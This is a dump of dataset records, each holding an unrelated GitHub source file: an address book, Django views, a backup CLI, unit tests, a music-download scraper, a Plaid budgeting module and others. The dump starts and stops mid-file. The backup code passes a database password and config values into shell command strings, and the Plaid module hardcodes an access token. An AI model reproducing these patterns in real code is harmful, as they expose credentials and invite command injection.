number):\r\n if number in self.phones:\r\n self.phones.remove(number)\r\n else:\r\n raise ValueError\r\n\r\n def edit_phone(self, old_number, new_number):\r\n if old_number in self.phones:\r\n idx = \"\"\r\n for number in self.phones:\r\n if number == old_number:\r\n idx = self.phones.index(number)\r\n self.phones[idx] = new_number\r\n \r\n else:\r\n raise ValueError\r\n\r\n def find_phone(self, number):\r\n if number in self.phones:\r\n self.value = number\r\n return self\r\n else:\r\n return None\r\n\r\n\r\nclass AddressBook(UserDict):\r\n contacts = {}\r\n # AddressBook: Клас для зберігання та управління записами.\r\n # Успадковується від UserDict, та містить логіку пошуку за записами до цього класу\r\n # AddressBook:\r\n # Додавання записів.\r\n # Пошук записів за іменем.\r\n # Видалення записів за іменем.\r\n # Клас AddressBook:\r\n # Реалізовано метод add_record, який додає запис до self.data.\r\n # Реалізовано метод find, який знаходить запис за ім'ям.\r\n # Реалізовано метод delete, який видаляє запис за ім'ям.\r\n # Записи Record у AddressBook зберігаються як значення у словнику. В якості ключів використовується значення Record.name.value.\r\n\r\n # 1. Метод add_record класу AddressBook не зберіг запис Record!\r\n # 2. Метод find класу AddressBook не повернув запис Record який був збережений!\r\n # 3. Провалена перевірка. Якщо запису не існує то метод find класу AddressBook повинен повернути None!\r\n # 2. Метод delete класу AddressBook не видалив запис Record який був збережений!\r\n # 3. Провалена перевірка. Метод delete класу AddressBook не видалив запис!\r\n\r\n def add_record(self, contact:Record):\r\n self.data[contact.name.value] = contact\r\n\r\n def find(self, name):\r\n if name in self.data:\r\n return self.data[name]\r\n else:\r\n return None\r\n\r\n def delete(self, contact):\r\n if contact in self.data:\r\n return self.data.pop(contact)\r\n else:\r\n return None\r\n\r\n\r\nif __name__ == \"__main__\":\r\n book = AddressBook()\r\n\r\n # Створення запису для John\r\n john_record = Record(\"John\")\r\n john_record.add_phone(\"1234567890\")\r\n john_record.add_phone(\"5555555555\")\r\n\r\n # # Додавання запису John до адресної книги\r\n book.add_record(john_record)\r\n\r\n # # Створення та додавання нового запису для Jane\r\n # jane_record = Record(\"Jane\")\r\n # jane_record.add_phone(\"9876543210\")\r\n # book.add_record(jane_record)\r\n\r\n # # Виведення всіх записів у книзі\r\n # for name, record in book.data.items():\r\n # print(record)\r\n\r\n # Знаходження та редагування телефону для John\r\n john = book.find(\"John\")\r\n john.edit_phone(\"1234567890\", \"1112223333\")\r\n\r\n print(john) # Виведення: Contact name: John, phones: 1112223333; 5555555555\r\n\r\n # Пошук конкретного телефону у записі John\r\n found_phone = john.find_phone(\"5555555555\")\r\n print(f\"{john.name}: {found_phone}\") # Виведення: 5555555555\r\n\r\n # Видалення запису Jane\r\n book.delete(\"Jane\")\r\n","repo_name":"lFlySparkl/hw10","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7315,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"74022431018","text":"from django.shortcuts import render\nfrom .forms import contactform\nfrom student.models import Activity\nfrom .models import *\nfrom student.models import *\nfrom .models import Subscribe\nfrom django.contrib import messages\n\n\n# Create your views here.\ndef home(request):\n course = Course.objects.all()[:6]\n teacherlen=Teacher.objects.all().count()\n courselen=Course.objects.all().count()\n studentlen=User.objects.all().count()-teacherlen\n return render(request, 'home/index.html', {'course': course,'courselen':courselen,'teacherlen':teacherlen,'studentlen':studentlen})\n\n\ndef aboutus(request):\n return render(request, 'home/about.html')\n\n\ndef contactus(request):\n form = contactform()\n if request.method == 'POST':\n details = contactform(request.POST)\n print(details.errors)\n if details.is_valid():\n details.save()\n print('saved')\n\n return render(request, 'home/contact.html', {'form': form})\n\n\ndef subscribe(request):\n print(request.method)\n if request.method == \"POST\":\n num = request.POST.get('newsletter')\n if len(num) == 10:\n res=Subscribe(number=num)\n res.save()\n messages.success(request, 'Subscribe successful')\n else:\n messages.error(request, 'Please Enter The Valid Number')\n return render(request, 'home/index.html')\n","repo_name":"kaifkhan1040/DeepPathshala","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"27035129132","text":"import subprocess\nimport os\nimport uuid\nfrom pathlib import Path\nfrom cement import Controller, ex\nfrom mylibrary.ext.base.dump import save_dump, save_ftp\n\n\nclass Backup(Controller):\n class Meta:\n label = 'backup'\n description = 'MyLibrary backup'\n\n @ex(\n help='server data backup',\n arguments=[\n (['-t', '--type'],\n dict(\n dest='type',\n action='store',\n default='db',\n choices=['db', 'tar'])),\n ],\n )\n def backup(self):\n if self.app.pargs.type is not None:\n if self.app.pargs.type == 'db':\n self._db()\n if self.app.pargs.type == 'tar':\n self._tar()\n\n # noinspection PyBroadException\n @ex(hide=True)\n def _db(self):\n db_user = self.app.config.get('db_conf', 'user')\n db_pass = self.app.config.get('db_conf', 'passwd')\n db_name = self.app.config.get('db_conf', 'name')\n home = self.app.config.get('mylibrary', 'home')\n tmp = '{}/{}.sql'.format(home, uuid.uuid4())\n\n # subprocess for suppress output warning\n subprocess.getoutput('mysqldump -u {} -p{} {} > {}'.format(db_user, db_pass, db_name, tmp))\n try:\n save_dump(self.app, tmp)\n save_ftp(self.app, tmp)\n self.app.log.info('save db dump done')\n except:\n self.app.log.error('An error occurred while saving, check config file.')\n os.remove(tmp)\n\n # noinspection PyBroadException\n @ex(hide=True)\n def _tar(self):\n files = self.app.config.get('dump_tar', 'files')\n dirs = self.app.config.get('dump_tar', 'dirs')\n exclude = self.app.config.get('dump_tar', 'exclude')\n processes = self.app.config.get('dump_tar', 'processes')\n result = {}\n\n for item in files:\n if os.path.isfile(item):\n self.app.log.info('Start compress file: {}'.format(item))\n home = self.app.config.get('mylibrary', 'home')\n tmp = '{}/{}.tar.gz'.format(home, uuid.uuid4())\n subprocess.getoutput(\n 'tar --absolute-names --use-compress-program=\"pigz --best --recursive -p {}\" -cf {} {}'.format(processes,\n tmp,\n item))\n result[item] = tmp\n else:\n self.app.log.error('File not exits: {}'.format(item))\n\n for item in dirs:\n if os.path.isdir(item):\n self.app.log.info('Start compress dir: {}'.format(item))\n home = self.app.config.get('mylibrary', 'home')\n tmp = '{}/{}.tar.gz'.format(home, uuid.uuid4())\n if not exclude:\n subprocess.getoutput(\n 'tar --absolute-names --use-compress-program=\"pigz --best --recursive -p {}\" -cf {} {}'.format(processes,\n tmp,\n item))\n else:\n _exclude = '--exclude={}'.format(' --exclude='.join(exclude))\n subprocess.getoutput(\n 'tar --absolute-names --use-compress-program=\"pigz --best --recursive -p {}\" {} -cf {} {}'.format(processes,\n _exclude,\n tmp,\n item))\n result[item] = tmp\n else:\n self.app.log.error('Dir not exits: {}'.format(item))\n\n for item in result:\n try:\n save_dump(self.app, result[item], item)\n save_ftp(self.app, result[item], item)\n except:\n self.app.log.error('An error occurred while saving, check config file.')\n os.remove(result[item])\n self.app.log.info('save tars dump done')\n","repo_name":"keygenqt/MyLibrary-server","sub_path":"mylibrary/controllers/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"18519248339","text":"n=int(input())\nal=list(map(int,input().split()))\nt=[]\nfor i in range(n):\n t.append(al[i]-(i+1))\nt=sorted(t)\nif n%2==0:\n v=(t[n//2-1]+t[n//2])//2\nelse:\n v=t[n//2]\nans=0\nfor i in t:\n ans+=abs(i-v)\nprint(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03311/s859792343.py","file_name":"s859792343.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"14065509491","text":"import numpy as np\nimport pytest\n\nfrom improver.utilities.neighbourhood_tools import (\n boxsum,\n pad_and_roll,\n pad_boxsum,\n rolling_window,\n)\n\n\n@pytest.fixture\ndef array_size_5():\n return np.arange(25).astype(np.int32).reshape((5, 5))\n\n\n@pytest.fixture\ndef array_size_3():\n return np.arange(9).astype(np.int32).reshape((3, 3))\n\n\ndef test_rolling_window_neighbourhood_size_2(array_size_5):\n \"\"\"Test producing a 2 * 2 neighbourhood.\"\"\"\n windows = rolling_window(array_size_5, (2, 2))\n expected = np.zeros((4, 4, 2, 2), dtype=np.int32)\n for i in range(4):\n for j in range(4):\n expected[i, j] = array_size_5[i : i + 2, j : j + 2]\n np.testing.assert_array_equal(windows, expected)\n\n\ndef test_rolling_window_exception_too_many_dims(array_size_5):\n \"\"\"Test an exception is raised if shape has too many dimensions.\"\"\"\n msg = (\n \"Number of dimensions of the input array must be greater than or \"\n \"equal to the length of the neighbourhood shape used for \"\n \"constructing rolling window neighbourhoods.\"\n )\n with pytest.raises(ValueError) as exc_info:\n rolling_window(array_size_5, (2, 2, 2))\n assert msg in str(exc_info.value)\n\n\ndef test_rolling_window_exception_dims_too_large(array_size_5):\n \"\"\"Test an exception is raised if dimensions of shape are larger than\n corresponding dimensions of input array.\"\"\"\n msg = (\n \"The calculated shape of the output array view contains a \"\n \"dimension that is negative or zero. Each dimension of the \"\n \"neighbourhood shape must be less than or equal to the \"\n \"corresponding dimension of the input array.\"\n )\n with pytest.raises(RuntimeError) as exc_info:\n rolling_window(array_size_5, (2, 6))\n assert msg in str(exc_info.value)\n\n\ndef test_rolling_window_writable(array_size_5):\n \"\"\"Test that result is writable if and only if `writable` is True.\"\"\"\n windows = rolling_window(array_size_5, (2, 2))\n msg = \"assignment destination is read-only\"\n with pytest.raises(ValueError) as exc_info:\n windows[0, 0, 0, 0] = -1\n assert msg in str(exc_info.value)\n windows = rolling_window(array_size_5, (2, 2), writeable=True)\n windows[0, 0, 0, 0] = -1\n assert windows[0, 0, 0, 0] == -1\n\n\ndef test_padding_neighbourhood_size_2(array_size_5):\n \"\"\"Test that result is same as result of rolling_window with a border of zeros.\"\"\"\n padded = pad_and_roll(array_size_5, (2, 2), mode=\"constant\")\n window = rolling_window(array_size_5, (2, 2))\n inner_part = padded[1:-1, 1:-1, ::]\n np.testing.assert_array_equal(inner_part, window)\n border_index = (\n [[0, i, 0, j] for i in range(5) for j in [0, 1]]\n + [[5, i, 1, j] for i in range(5) for j in [0, 1]]\n + [[i, 0, j, 0] for i in range(5) for j in [0, 1]]\n + [[i, 5, j, 1] for i in range(5) for j in [0, 1]]\n )\n outer_part = padded[list(zip(*border_index))]\n np.testing.assert_array_equal(outer_part, np.zeros(40, dtype=np.int32))\n\n\ndef test_padding_non_zero(array_size_5):\n \"\"\"Test padding with a number other than the default of 0.\"\"\"\n padded = pad_and_roll(array_size_5, (2, 2), mode=\"constant\", constant_values=1)\n border_index = (\n [[0, i, 0, j] for i in range(5) for j in [0, 1]]\n + [[5, i, 1, j] for i in range(5) for j in [0, 1]]\n + [[i, 0, j, 0] for i in range(5) for j in [0, 1]]\n + [[i, 5, j, 1] for i in range(5) for j in [0, 1]]\n )\n outer_part = padded[list(zip(*border_index))]\n np.testing.assert_array_equal(outer_part, np.ones(40, dtype=np.int32))\n\n\ndef test_pad_boxsum(array_size_3):\n \"\"\"Test that padded array consists of input array surrounded by border of zeros.\"\"\"\n padded = pad_boxsum(array_size_3, 3, mode=\"constant\")\n expected = np.zeros((6, 6), dtype=np.int32)\n expected[2:5, 2:5] = array_size_3\n np.testing.assert_array_equal(padded, expected)\n\n\ndef test_pad_boxsum_non_zero(array_size_3):\n \"\"\"Test padding with a number other than the default of 0.\"\"\"\n padded = pad_boxsum(array_size_3, 3, mode=\"constant\", constant_values=2)\n expected = 2 * np.ones((6, 6), dtype=np.int32)\n expected[2:5, 2:5] = array_size_3\n np.testing.assert_array_equal(padded, expected)\n\n\ndef test_boxsum_with_automatic_cumsum(array_size_5):\n \"\"\"Test that boxsum correctly calculates neighbourhood sums using raw array.\"\"\"\n result = boxsum(array_size_5, 3)\n expected = np.array(\n [\n [np.sum(array_size_5[i - 1 : i + 2, j - 1 : j + 2]) for j in [2, 3]]\n for i in [2, 3]\n ]\n )\n np.testing.assert_array_equal(result, expected)\n\n\ndef test_boxsum_non_square(array_size_5):\n \"\"\"Test that boxsum correctly calculates neighbourhood sums using\n non-square box.\"\"\"\n result = boxsum(array_size_5, (1, 3))\n expected = np.array(\n [[np.sum(array_size_5[i, j - 1 : j + 2]) for j in [2, 3]] for i in range(1, 5)]\n )\n np.testing.assert_array_equal(result, expected)\n\n\ndef test_boxsum_with_precalculated_cumsum(array_size_5):\n \"\"\"Test that boxsum correctly calculates neighbourhood sums using\n pre-calculated cumsum.\"\"\"\n cumsum_arr = np.array(\n [[np.sum(array_size_5[: i + 1, : j + 1]) for j in range(5)] for i in range(5)]\n )\n result = boxsum(cumsum_arr, 3, cumsum=False)\n expected = np.array(\n [\n [np.sum(array_size_5[i - 1 : i + 2, j - 1 : j + 2]) for j in [2, 3]]\n for i in [2, 3]\n ]\n )\n np.testing.assert_array_equal(result, expected)\n\n\ndef test_boxsum_with_padding(array_size_5):\n \"\"\"Test that boxsum correctly calculates neighbourhood sums when adding padding to array.\"\"\"\n result = boxsum(array_size_5, 3, mode=\"constant\", constant_values=0)\n expected = np.array(\n [\n [\n np.sum(array_size_5[max(0, i - 1) : i + 2, max(0, j - 1) : j + 2])\n for j in range(5)\n ]\n for i in range(5)\n ]\n )\n np.testing.assert_array_equal(result, expected)\n\n\ndef test_boxsum_exception_non_integer(array_size_5):\n \"\"\"Test that an exception is raised if `boxsize` is not an integer.\"\"\"\n msg = \"The size of the neighbourhood must be of an integer type.\"\n with pytest.raises(ValueError) as exc_info:\n boxsum(array_size_5, 1.5)\n assert msg in str(exc_info.value)\n\n\ndef test_boxsum_exception_not_odd(array_size_5):\n \"\"\"Test that an exception is raised if `boxsize` contains a number that is not odd.\"\"\"\n msg = \"The size of the neighbourhood must be an odd number.\"\n with pytest.raises(ValueError) as exc_info:\n boxsum(array_size_5, (1, 2))\n assert msg in str(exc_info.value)\n","repo_name":"metoppv/improver","sub_path":"improver_tests/utilities/test_neighbourhood_tools.py","file_name":"test_neighbourhood_tools.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"90"} +{"seq_id":"42278759420","text":"\n''' Problem Statement : To get the Nth node in a linked list\nAlgorithm: 1. Initialize count = 0\n 2. Loop through the link list\n a. if count is equal to the passed index then return current node\n b. Increment count\n c. change current to point to next of the current.\nReferences : https://www.geeksforgeeks.org/write-a-function-to-get-nth-node-in-a-linked-list/'''\n\n\n# Returns data at given index in linked list \ndef getDataAtNthIndex(self, index): \n current = self.head # Initialise temp \n count = 0 # Index of current node \n \n # Loop while end of linked list is not reached \n while (current): \n if (count == index): #If the current index holds the data to be found\n return current.data \n count += 1 #Increment the value of count\n current = current.next #Shift the pointer to next node\n \n # if we get to this line, the user was asking \n # for a non-existent element so we assert fail \n assert(False) \n return 0; \n","repo_name":"manvi0308/100DaysOfAlgo","sub_path":"Day 16/GetNthNodeInALinkedList.py","file_name":"GetNthNodeInALinkedList.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"90"} +{"seq_id":"17350287162","text":"# args are like list where as kwargs keyword arguments are like dictionaries args are some what similar to sum(String...s) like passing one or more strings in Java\n# for agrs there will be only one star where as for kwargs 2 stars\n# we can also write methods that that accepts both args and kwargs myblog_posts(*args,**kwargs)\nblog_1 = 'I am so awesome'\nblog_2 = 'Cars are cool.'\nblog_3 = 'Aww look at my cat.'\n\n\n'''\ndef blog_posts(*args):\n for post in args:\n print(post)\n \n#blog_posts(blog_1) \nblog_posts(blog_1,blog_2,blog_3)\n'''\n\n'''\ndef blog_posts(title,*args):\n print(title)\n for post in args:\n print(post)\nsite_title='My Blogs' \n#blog_posts(site_title) # here i didnt pass any arguments except title\n#blog_posts(site_title,blog_1)\nblog_posts(site_title,blog_1,blog_2,blog_3)\n'''\n\nsite_title='My Blogs' \ndef blog_posts_kw(title,**kwargs):\n print(title)\n for p_title,post in kwargs.items():\n print(p_title,post)\n \n#blog_posts_kw(site_title) # no arguments\n\nblog_posts_kw(site_title,blog_1 = 'I am so awesome',\n blog_2 = 'Cars are cool.',\n blog_3 = 'Aww look at my cat.')\ndef blog_posts_args_kwargs(title,*args,**kwargs):\n print(title)\n for arg in args:\n print(arg)\n for p_title,post in kwargs.items():\n print(p_title,post)\n\nprint(\"below is args and kwargs calling \")\nblog_posts_args_kwargs(site_title,'1','2','3',blog_1 = 'I am so awesome',\n blog_2 = 'Cars are cool.',\n blog_3 = 'Aww look at my cat.')\n \n \n","repo_name":"yadagiricse1/PracticePythonCode","sub_path":"IntermediatePython/Args_and_Kwargs.py","file_name":"Args_and_Kwargs.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"6898432115","text":"from selenium import webdriver\r\nfrom tqdm import tqdm\r\nimport time,re,requests,os\r\n\r\nheaders = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'\r\n}\r\n\r\n# 创建歌单文件夹\r\ndef create_file(user):\r\n if not os.path.exists(user):\r\n os.mkdir(user)\r\n\r\n# 获取并保存创建的播放列表\r\ndef get_play_list(user,user_url):\r\n driver = webdriver.Chrome()\r\n driver.get(user_url)\r\n driver.switch_to.frame(\"g_iframe\")\r\n menu = driver.find_element_by_class_name('m-cvrlst').find_elements_by_tag_name('li')\r\n for i in range(len(menu)):\r\n hf = menu[i].find_element_by_class_name('msk').get_attribute('href')\r\n name = menu[i].find_element_by_class_name('tit').get_attribute('title')\r\n with open(user+'/'+user+'.txt','a',encoding='utf-8') as f:\r\n f.write(name+' '+hf+'\\n')\r\n print(name,hf)\r\n driver.close()\r\n song_list = input('请输入要下载歌曲的链接:')\r\n main(song_list)\r\n\r\ndef main(song_list):\r\n # 登录操作\r\n driver = webdriver.Chrome()\r\n driver.get(song_list)\r\n driver.maximize_window()\r\n time.sleep(3)\r\n\r\n driver.find_element_by_xpath('/html/body/div[1]/div[1]/div/div[1]/a').click()\r\n time.sleep(1)\r\n driver.find_element_by_xpath('/html/body/div[6]/div[2]/div/div[2]/div/div[3]/a').click()\r\n driver.find_element_by_xpath('//*[@id=\"j-official-terms\"]').click()\r\n driver.find_element_by_xpath('/html/body/div[6]/div[2]/div/div[1]/div[1]/div[2]/ul/li[1]/a').click()\r\n time.sleep(7)\r\n\r\n driver.minimize_window()\r\n # 获取歌单歌曲\r\n driver.switch_to.frame(\"g_iframe\")\r\n info=driver.find_element_by_xpath('//table[@class=\"m-table \"]/tbody').find_elements_by_tag_name(\"tr\")\r\n\r\n # 获取歌曲链接及名字\r\n for i in tqdm(range(len(info))):\r\n hf=info[i].find_element_by_tag_name(\"a\").get_attribute('href')\r\n name = info[i].find_element_by_tag_name(\"b\").get_attribute('title')\r\n res = re.findall('(?<=id=).*$', hf)\r\n # 下载歌曲\r\n if not os.path.exists('歌曲'):\r\n os.mkdir('歌曲')\r\n download_song_url = 'http://music.163.com/song/media/outer/url?id=' + res[0] + '.mp3'\r\n ans = requests.get(download_song_url,headers=headers)\r\n print('正在下载:',name)\r\n if name in \":\" or '*' or \"?\" or '<' or '>' or '|' or '/' or '\"' or '\\\\':\r\n name = name.replace(\":\",'_').replace('*','_').replace(\"?\",'_').replace('<','_').replace('>','_').replace('|','_').replace('/','_').replace('\"','_').replace('\\\\','_')\r\n with open('歌曲/'+name+'.mp3','ab') as f:\r\n f.write(ans.content)\r\n driver.quit()\r\n print('下载完成!')\r\n\r\nif __name__ == '__main__':\r\n home_url = 'https://music.163.com/#/user/home?id='\r\n user = input('请输入用户昵称:')\r\n id = input('请输入用户ID:')\r\n user_url = home_url + id\r\n create_file(user)\r\n get_play_list(user,user_url)","repo_name":"perhapszeyi/download_cloud_song","sub_path":"download_netease_cloud_song.py","file_name":"download_netease_cloud_song.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"73221447335","text":"# https://leetcode.com/problems/inorder-successor-in-bst/\nclass Solution:\n def __init__(self):\n self.res = []\n\n def inorder(self, root):\n if root:\n self.inorder(root.left)\n self.res.append(int(root.val))\n self.inorder(root.right)\n\n def inorderSuccessor(self, root: 'TreeNode', p: 'TreeNode') -> 'TreeNode':\n self.inorder(root)\n value = p.val\n if value in self.res:\n ind = self.res.index(value)\n if ind + 1 >= len(self.res):\n return None\n else:\n return TreeNode(self.res[ind + 1])\n else:\n return None","repo_name":"client69/Open","sub_path":"Inorder_Successor_BinaryTree.py","file_name":"Inorder_Successor_BinaryTree.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"90"} +{"seq_id":"13130298709","text":"# Ahmed Rahman PSID:1820239\nlistMaker = input()\nlistToFilter = listMaker.split()\nyikersList=[]\nfor i in listToFilter:\n if int(i)>= 0:\n yikersList.append(int(i))\n\n\nyikersList.sort()\n\nfor i in yikersList:\n print(i,end=' ')\n","repo_name":"AMediumRamen/CIS2348_STUFF","sub_path":"Homework 3 stuff/11.18.py","file_name":"11.18.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17669084520","text":"#!/usr/bin/env python\n\n\nclass interpreter:\n\n def __init__(self):\n self.accumultaor = 0\n self.cursor = 0\n self.instructions = list()\n self.instruction_set = {\n \"acc\": self.acc,\n \"jmp\": self.jmp,\n \"nop\": lambda a: None\n }\n self.used = list()\n\n def load_instructions(self):\n with open(\"input.txt\") as f:\n for line in f.readlines():\n line = line.strip()\n instr, val = line.split(\" \")\n val = int(val)\n self.instructions.append((instr, val))\n\n def run(self):\n while 1:\n if self.cursor in self.used:\n print(self.accumultaor)\n break\n self.used.append(self.cursor)\n instr, val = self.instructions[self.cursor]\n self.instruction_set[instr](val)\n self.cursor += 1\n\n def acc(self, val):\n self.accumultaor += val\n\n def jmp(self, val):\n self.cursor += val-1\n\n\nif __name__ == '__main__':\n intr = interpreter()\n intr.load_instructions()\n intr.run()\n","repo_name":"tomatih/AdventOfCode2020","sub_path":"Day08/silver.py","file_name":"silver.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5865525917","text":"import json\nimport re\nimport datetime\nimport sqlalchemy.exc\nfrom flask import jsonify\n\nimport plaid\nfrom pybudget.DB import Transactions, EXPENSE, INCOME, get_session\nfrom pybudget.api_helpers import valid_transaction_entry\nfrom pybudget.Budget import get_rules\nfrom pybudget import client\n\n\ndef get_transactions(month, category=None, flow=None):\n print(month)\n session = get_session()\n query = session.query(Transactions).filter(Transactions.month == month)\n if category is not None:\n query = query.filter(Transactions.category == category)\n if flow is not None:\n query = query.filter(Transactions.flow == flow)\n transactions = []\n for row in query.all():\n dict_item = row.__dict__\n transaction = {'date': dict_item['date'],\n 'name': dict_item['vendor'],\n 'category': dict_item['category'],\n 'amount': dict_item['amount'],\n 'id': dict_item['id']}\n transactions.append(transaction)\n return transactions\n\n\ndef get_totals(month, category, flow):\n session = get_session()\n if flow != EXPENSE and flow != INCOME:\n raise ValueError('Flow should be {} or {}'.format(EXPENSE, INCOME))\n query = session.query(Transactions.category, Transactions.amount).filter(Transactions.month == month, Transactions.flow == flow)\n if category is not None:\n query = query.filter(Transactions.category == category)\n query.group_by(Transactions.category)\n totals = {}\n for item in query.all():\n cat = item[0]\n if cat == '':\n cat = 'Uncategorized'\n if cat not in totals:\n totals[cat] = 0\n totals[cat] += item[1]\n return totals\n\n\ndef get_expense_totals(month, category=None):\n session = get_session()\n return get_totals(month, category, EXPENSE)\n\n\ndef get_income_totals(month, category=None):\n session = get_session()\n return get_totals(month, category, INCOME)\n\n\ndef remove_transaction(id):\n session = get_session()\n transaction_query = session.query(Transactions).filter(Transactions.id == id)\n if transaction_query.count() == 0:\n raise KeyError('{} was not found!'.format(id))\n transaction = transaction_query.all()[0]\n session.delete(transaction)\n return True\n\n\ndef refresh_transactions(month):\n rules = get_rules()\n session = get_session()\n query = session.query(Transactions).filter(Transactions.month == month)\n for row in query.all():\n dict_row = row.__dict__\n for rule in rules:\n print(\"checking {} against {}\".format(dict_row['vendor'], rule['regex']))\n if re.match(rule['regex'], str.lower(dict_row['vendor'])):\n print(\"updating {} to category {}\".format(dict_row['vendor'], rule['category']))\n row.category = rule['category']\n break\n session.commit()\n\n\ndef add_imported_transaction(date, month, vendor, amount, category, session, flow=EXPENSE):\n transaction = Transactions(date=date, month=month, imported_vendor=vendor, amount=amount, flow=flow,\n category=category)\n session.add(transaction)\n session.commit()\n\n\ndef add_api_transaction(json):\n session = get_session()\n added = 0\n invalid = 0\n for entry in json:\n if valid_transaction_entry(entry):\n if 'month' not in entry:\n entry['month'] = entry['date'][0:2] + entry['date'][8:10]\n if 'notes' not in entry:\n entry['notes'] = ''\n if 'category' not in entry:\n entry['category'] = ''\n\n transaction = Transactions(date=entry['date'],\n month=entry['month'],\n vendor=entry['vendor'],\n amount=entry['amount'],\n notes=entry['notes'],\n flow=entry['flow'],\n category=entry['category'])\n session.add(transaction)\n else:\n invalid += 1\n try:\n session.commit()\n added += 1\n except sqlalchemy.exc.OperationalError as ex:\n print(ex)\n added = -1\n except sqlalchemy.exc.IntegrityError as ex:\n # TODO: This should be optimized to so we aren't getting new sessions all of the time\n session = get_session()\n print(ex)\n return added, invalid\n\n\ndef remote_import_transactions():\n session = get_session()\n # Pull transactions for the last 30 days\n start_date = '{:%Y-%m-%d}'.format(datetime.datetime.now() + datetime.timedelta(-30))\n end_date = '{:%Y-%m-%d}'.format(datetime.datetime.now())\n rules = get_rules()\n try:\n # item_id = DgPQ0POqJrIEMLMrNxxPF4Z3jZnjPvFwyz1Kp\n access_token = \"access-development-7ae93fc0-c4f2-4f35-b2e2-952eeb011db7\"\n transactions_response = client.Transactions.get(access_token, start_date, end_date)\n with open('transactions.json', 'w') as f:\n f.write(json.dumps(transactions_response, indent=2, sort_keys=True))\n print(\"Found {} transactions\".format(transactions_response['total_transactions']))\n for transaction in transactions_response['transactions']:\n # category = check_rules(rules, transactions_response['name'])\n category = ''\n entry = Transactions(date=transaction['date'],\n month=transaction['date'][5:7] + transaction['date'][2:4],\n vendor=transaction['name'],\n amount=transaction['amount'],\n flow=EXPENSE,\n category=category,\n transaction_id=transaction['transaction_id'])\n try:\n session.add(entry)\n session.commit()\n except sqlalchemy.exc.IntegrityError:\n # Just a duplicate entry, ignore it\n session.rollback()\n pass\n except plaid.errors.PlaidError as e:\n return jsonify(format_error(e))\n\n\ndef pretty_print_response(response):\n print(json.dumps(response, indent=2, sort_keys=True))\n\n\ndef format_error(e):\n return {'error': {'display_message': e.display_message, 'error_code': e.code, 'error_type': e.type,\n 'error_message': e.message}}\n","repo_name":"sroehl/pybudget","sub_path":"pybudget/Transactions.py","file_name":"Transactions.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"22593422658","text":"\r\nimport requests\r\nimport json\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport networkx as nx\r\n\r\ndef followers_pie_chart(response):\r\n followers = r['followers']\r\n following = r['following']\r\n labels = 'Followers', 'Following'\r\n sizes = [followers, following]\r\n fig1, ax1 = plt.subplots()\r\n ax1.pie(sizes, labels=labels, autopct='%1.1f%%',\r\n shadow=True, startangle=90)\r\n ax1.axis('equal')\r\n plt.show()\r\n return\r\n\r\ndef percentageFollowback(response):\r\n followingURL = r['following_url']\r\n followersURL = r['followers_url']\r\n if followingURL.endswith('{/other_user}'):\r\n followingURL = followingURL[:-13]\r\n if followersURL.endswith('{/other_user}'):\r\n followersURL = followersURL[:-13]\r\n\r\n\r\n t = requests.get(followingURL).json()\r\n y = 0\r\n followingList = []\r\n followersList = []\r\n while y < len(t):\r\n name = t[y]['login']\r\n followingList.append(name + ', ')\r\n y += 1\r\n q = requests.get(followersURL).json()\r\n y = 0\r\n while y < len(q):\r\n name = q[y]['login']\r\n followersList.append(name + ', ')\r\n y += 1\r\n biggestList = 0\r\n if followingList > followersList:\r\n biggestList = len(followingList)\r\n else:\r\n biggestList = len(followersList)\r\n matchingFollowersSet = set(followersList) & set(followingList)\r\n percentageFollowbacks = (len(matchingFollowersSet) / biggestList) * 100\r\n objects = ''\r\n y_pos = np.arange(1)\r\n performance = [100, percentageFollowbacks]\r\n\r\n plt.bar(y_pos, performance, align='center',label='Followbacks', alpha=0.5)\r\n plt.xticks(y_pos, objects)\r\n plt.ylabel('%')\r\n plt.xlabel(str(r['login']))\r\n plt.title('Ratio of followbacks')\r\n\r\n plt.show()\r\n return\r\n\r\ndef repos(response):\r\n\r\n reposList = []\r\n reposURL = r['repos_url']\r\n followingURL = r['following_url']\r\n if followingURL.endswith('{/other_user}'):\r\n followingURL = followingURL[:-13]\r\n\r\n\r\n\r\n t = requests.get(reposURL, auth=auth).json()\r\n t = requests.get(followingURL, auth=auth).json()\r\n\r\n y = 0\r\n followingList = []\r\n followingLista = []\r\n while y < len(t):\r\n name = t[y]['repos_url']\r\n followingList.append(name + ', ')\r\n y += 1\r\n\r\n for x in range(0, len(followingList)):\r\n if followingList[x].endswith(', '):\r\n followingList[x] = followingList[x][:-2]\r\n\r\n d=0\r\n while d 100):\n ax.plot(x, y, 'r.', markersize=0.5)\n else:\n ax.plot(x, y, 'r.', 